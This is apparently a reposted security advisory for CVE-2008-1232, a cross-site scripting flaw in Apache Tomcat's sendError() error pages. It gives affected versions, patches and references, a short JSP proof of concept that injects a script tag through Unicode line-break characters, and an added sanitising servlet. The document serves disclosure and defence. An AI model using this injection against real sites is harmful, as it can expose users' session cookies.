Written by Konstantin Kolinko   
Wednesday, 11 March 2009 22:09
Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability


-\\Bugtraq ID:
30496

-\\Class:
Input Validation Error

-\\CVE:
CVE-2008-1232


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Aug 01 2008 12:00AM

-\\Updated:
Mar 11 2009 05:46PM

-\\Credit:
Konstantin Kolinko



-\\Vulnerable:
WiKID Systems WiKID Server 3.0.4
VMWare VirtualCenter 2.0.2
VMWare VirtualCenter  2.5.Update 3 build 1
VMWare VirtualCenter  2.5 Update 2
VMWare VirtualCenter  2.5 Update 1
VMWare VirtualCenter  2.5
VMWare ESX Server 3.0.3
VMWare ESX Server 3.0.2
VMWare ESX Server  3.5
Sun Solaris  9_x86
Sun Solaris  9
Sun Solaris  10.0_x86
Sun Solaris  10.0
Sun OpenSolaris  build snv_99
Sun OpenSolaris  build snv_96
Sun OpenSolaris  build snv_95
Sun OpenSolaris  build snv_92
Sun OpenSolaris  build snv_91
Sun OpenSolaris  build snv_90
Sun OpenSolaris  build snv_89
Sun OpenSolaris  build snv_88
Sun OpenSolaris  build snv_87
Sun OpenSolaris  build snv_86
Sun OpenSolaris  build snv_85
Sun OpenSolaris  build snv_84
Sun OpenSolaris  build snv_83
Sun OpenSolaris  build snv_82
Sun OpenSolaris  build snv_81
Sun OpenSolaris  build snv_80
Sun OpenSolaris  build snv_78
Sun OpenSolaris  build snv_77
Sun OpenSolaris  build snv_76
Sun OpenSolaris  build snv_68
Sun OpenSolaris  build snv_67
Sun OpenSolaris  build snv_64
Sun OpenSolaris  build snv_61
Sun OpenSolaris  build snv_59
Sun OpenSolaris  build snv_57
Sun OpenSolaris  build snv_50
Sun OpenSolaris  build snv_39
Sun OpenSolaris  build snv_36
Sun OpenSolaris  build snv_29
Sun OpenSolaris  build snv_22
Sun OpenSolaris  build snv_19
Sun OpenSolaris  build snv_13
Sun OpenSolaris  build snv_100
Sun OpenSolaris  build snv_02
Sun OpenSolaris  build snv_01
S.u.S.E. SUSE Linux Enterprise Server  10 SP2
S.u.S.E. openSUSE  11.0
S.u.S.E. openSUSE  10.3
S.u.S.E. openSUSE  10.2
RedHat Red Hat Network Satellite Server 5.0.1
RedHat Red Hat Network Satellite Server 5.0
RedHat Red Hat Network Satellite (for RHEL 4)  5.1
RedHat Fedora 9  0
RedHat Fedora 8  0
RedHat Enterprise Linux Desktop Workstation  5 client
RedHat Enterprise Linux Desktop  5 client
RedHat Enterprise Linux  5 server
RedHat Developer Suite AS4  3
RedHat Application Server WS4  2
RedHat Application Server ES4  2
RedHat Application Server AS4  2
Pardus Linux 2008  0
MandrakeSoft Linux Mandrake  2008.1 x86_64
MandrakeSoft Linux Mandrake  2008.1
MandrakeSoft Linux Mandrake  2008.0 x86_64
MandrakeSoft Linux Mandrake  2008.0
HP HP-UX  B.11.31
HP HP-UX  B.11.23
HP HP-UX  B.11.11
Avaya Meeting Exchange - Enterprise Edition  
Avaya Meeting Exchange 5.0 .0.52
Avaya Meeting Exchange  5.0
Avaya AES 4.2.1
Avaya AES 4.0.1
Avaya AES 3.1.6
Avaya AES 3.1.5
Avaya AES 3.1.4
Avaya AES 3.1.3
Avaya AES  4.2
Avaya AES  4.1
Avaya AES  4.0
Avaya AES  3.1
Avaya AES  3.0
Apple Mac OS X Server 10.5.5
Apache Software Foundation Tomcat 6.0.16
Apache Software Foundation Tomcat 6.0.15
Apache Software Foundation Tomcat 6.0.14
Apache Software Foundation Tomcat 6.0.13
Apache Software Foundation Tomcat 6.0.12
Apache Software Foundation Tomcat 6.0.11
Apache Software Foundation Tomcat 6.0.10
Apache Software Foundation Tomcat 6.0.9
Apache Software Foundation Tomcat 6.0.8
Apache Software Foundation Tomcat 6.0.7
Apache Software Foundation Tomcat 6.0.6
Apache Software Foundation Tomcat 6.0.5
Apache Software Foundation Tomcat 6.0.4
Apache Software Foundation Tomcat 6.0.3
Apache Software Foundation Tomcat 6.0.2
Apache Software Foundation Tomcat 6.0.1
Apache Software Foundation Tomcat 6.0
Apache Software Foundation Tomcat 5.5.26
Apache Software Foundation Tomcat 5.5.25
Apache Software Foundation Tomcat 5.5.24
Apache Software Foundation Tomcat 5.5.23
Apache Software Foundation Tomcat 5.5.22
Apache Software Foundation Tomcat 5.5.21
Apache Software Foundation Tomcat 5.5.20
Apache Software Foundation Tomcat 5.5.19
Apache Software Foundation Tomcat 5.5.18
Apache Software Foundation Tomcat 5.5.17
Apache Software Foundation Tomcat 5.5.16
Apache Software Foundation Tomcat 5.5.15
Apache Software Foundation Tomcat 5.5.14
Apache Software Foundation Tomcat 5.5.13
Apache Software Foundation Tomcat 5.5.12
Apache Software Foundation Tomcat 5.5.11
Apache Software Foundation Tomcat 5.5.10
Apache Software Foundation Tomcat 5.5.9
Apache Software Foundation Tomcat 5.5.8
Apache Software Foundation Tomcat 5.5.7
Apache Software Foundation Tomcat 5.5.6
Apache Software Foundation Tomcat 5.5.5
Apache Software Foundation Tomcat 5.5.4
Apache Software Foundation Tomcat 5.5.3
Apache Software Foundation Tomcat 5.5.2
Apache Software Foundation Tomcat 5.5.1
Apache Software Foundation Tomcat 5.5
Apache Software Foundation Tomcat 4.1.37
Apache Software Foundation Tomcat 4.1.36
Apache Software Foundation Tomcat 4.1.34
+ Gentoo Linux 1.4 _rc3
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ Gentoo Linux 1.2
Apache Software Foundation Tomcat 4.1.32
Apache Software Foundation Tomcat 4.1.31
Apache Software Foundation Tomcat 4.1.30
Apache Software Foundation Tomcat 4.1.29
Apache Software Foundation Tomcat 4.1.28
Apache Software Foundation Tomcat 4.1.24
Apache Software Foundation Tomcat 4.1.12
Apache Software Foundation Tomcat 4.1.10
Apache Software Foundation Tomcat 4.1.9 beta
Apache Software Foundation Tomcat 4.1.3 beta
Apache Software Foundation Tomcat 4.1.3
Apache Software Foundation Tomcat 4.1
-BSDI BSD/OS 4.0
-Caldera OpenLinux 2.4
-Conectiva Linux 5.1
-Debian Linux 2.3
-Debian Linux 2.2
-Debian Linux 2.1
-Digital UNIX 4.0
-FreeBSD FreeBSD 5.0
-FreeBSD FreeBSD 4.5
-MandrakeSoft Linux Mandrake 7.1
-MandrakeSoft Linux Mandrake 7.0
-NetBSD NetBSD 1.4.2  x86
-NetBSD NetBSD 1.4.1  x86
-RedHat Linux 6.2  i386
-RedHat Linux 6.1  i386
-SGI IRIX 6.5
-SGI IRIX 6.4
-SGI IRIX 3.3
-Sun Solaris  8
-Sun Solaris  7.0



-\\Not Vulnerable:
WiKID Systems WiKID Server 3.0.5
Sun OpenSolaris  build snv_101
Apache Software Foundation Tomcat 6.0.18
Apache Software Foundation Tomcat 5.5.27
Apache Software Foundation Tomcat 4.1.38



-\\Discussion
Apache Tomcat is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input that is passed to HttpServletResponse.sendError() and reflected in the error page.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

The issue affects the following versions:

Tomcat 4.1.0 through 4.1.37
Tomcat 5.5.0 through 5.5.26
Tomcat 6.0.0 through 6.0.16



-\\Exploit(s)/PoC(s):
To exploit this issue, an attacker must entice an unsuspecting user to follow a malicious URI.

The following example is available:

===============================================================
30496.txt
^^^^^^^^^^
<%@page contentType="text/html"%>
<%
  // Unicode characters that the vulnerable versions end up printing as a bare CRLF
  final String CRLF = "\u010D\u010A";

  // Two line breaks, followed by the markup that is then rendered as HTML
  final String payload = CRLF + CRLF
      + "<script type='text/javascript'>document.write('Hi, there!')</script>"
      + "<div style='display:none'>";
  final String message = "Authorization is required to access " + payload;
  response.sendError(403, message);
%>




-\\Solution
Apache has released Tomcat 6.0.18 to address this issue in Tomcat 6. Fixes for Tomcat 4 and Tomcat 5 are available via the SVN repository. Please see the references for more information.
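Applications that forward user-controlled text into sendError() should sanitize it themselves instead of relying on the container. The following servlet is an added example, not code from the advisory or from Tomcat; the class name DeniedServlet, the request parameter res and the helper safeErrorMessage() are assumptions. The vulnerable form is kept as a comment for contrast with the hardened call.

```java
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Hypothetical servlet showing the sendError() pattern from the advisory's PoC.
public class DeniedServlet extends HttpServlet {

    // Reduces a message to printable ASCII and HTML-escapes it, so neither
    // markup nor characters the container might turn into CR/LF (such as the
    // \u010D\u010A pair in the PoC) reach the error page.
    static String safeErrorMessage(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:
                    // Drop control characters and anything outside printable ASCII.
                    if (c >= 0x20 && c < 0x7f) out.append(c);
            }
        }
        return out.toString();
    }

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String resource = req.getParameter("res");
        if (resource == null) resource = "";

        // Vulnerable on the versions listed above: the raw parameter is handed
        // to sendError() and reflected in the error page.
        // resp.sendError(HttpServletResponse.SC_FORBIDDEN,
        //         "Authorization is required to access " + resource);

        // Hardened: sanitize before the message reaches the container.
        // (Safer still: send a fixed message and log the detail server-side.)
        resp.sendError(HttpServletResponse.SC_FORBIDDEN,
                "Authorization is required to access " + safeErrorMessage(resource));
    }
}
```

Tomcat's default error page may escape the message a second time, so entities in the sanitized text can appear verbatim to the user; sending a fixed message and logging the detail avoids that entirely.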


MandrakeSoft Linux Mandrake  2008.0
--Mandriva  tomcat5-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/download/
--Mandriva  tomcat5-admin-webapps-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/download/
--Mandriva  tomcat5-common-lib-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/download/
--Mandriva  tomcat5-jasper-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/download/
--Mandriva  tomcat5-jasper-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/download/
--Mandriva  tomcat5-jsp-2.0-api-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/download/
--Mandriva  tomcat5-jsp-2.0-api-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/download/
--Mandriva  tomcat5-server-lib-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/download/
--Mandriva  tomcat5-servlet-2.4-api-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/download/
--Mandriva  tomcat5-servlet-2.4-api-javadoc-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/download/
--Mandriva  tomcat5-webapps-5.5.23-9.2.10.2mdv2008.0.i586.rpm
http://www.mandriva.com/en/download/

HP HP-UX  B.11.23
--HP  HPUXWSATW-B222-1123-32.depot
PA-32
http://software.hp.com
--HP  HPUXWSATW-B222-1123-64.depot
IA-64
http://software.hp.com
--HP  HPUXWSATW-B302-32.depot
IA-64
http://software.hp.com

Apache Software Foundation Tomcat 6.0.10
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.13
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.15
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.16
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.5
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.7
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz

Apache Software Foundation Tomcat 6.0.8
--Apache Software Foundation  apache-tomcat-6.0.18.tar.gz
http://mirror.atlanticmetro.net/apache/tomcat/tomcat-6/v6.0.18/bin/apache-tomcat-6.0.18.tar.gz



-\\Reference(s)
--Apache Tomcat 4.x vulnerabilities
http://tomcat.apache.org/security-4.htm  (Apache)
--Apache Tomcat 5.x vulnerabilities
http://tomcat.apache.org/security-5.htm  (Apache)
--Apache Tomcat 6.x vulnerabilities
http://tomcat.apache.org/security-6.htm  (Apache)
--Apache Tomcat Homepage
http://tomcat.apache.org  (Apache)
--Release Name: 3.0.5
https://sourceforge.net/project/shownotes.php?release_id=626903&group_id=14477  (WiKID Systems)
--Solution  251986 :   Security Vulnerabilities in Tomcat 5.5 may Lead to Cross S
http://sunsolve.sun.com/search/document.do?assetkey=1-66-251986-  (Sun Microsystem)
--[CVE-2008-1232] Apache Tomcat XSS vulnerability
http://www.securityfocus.com/archive/1/49502  (Mark Thomas)
--ASA-2008-401 - tomcat security update (RHSA-2008-0862)
http://support.avaya.com/elmodocs2/security/ASA-2008-401.ht  (Avaya)
--RHSA-2008:0648-10 tomcat security update
http://rhn.redhat.com/errata/RHSA-2008-0648.htm  (Red Hat)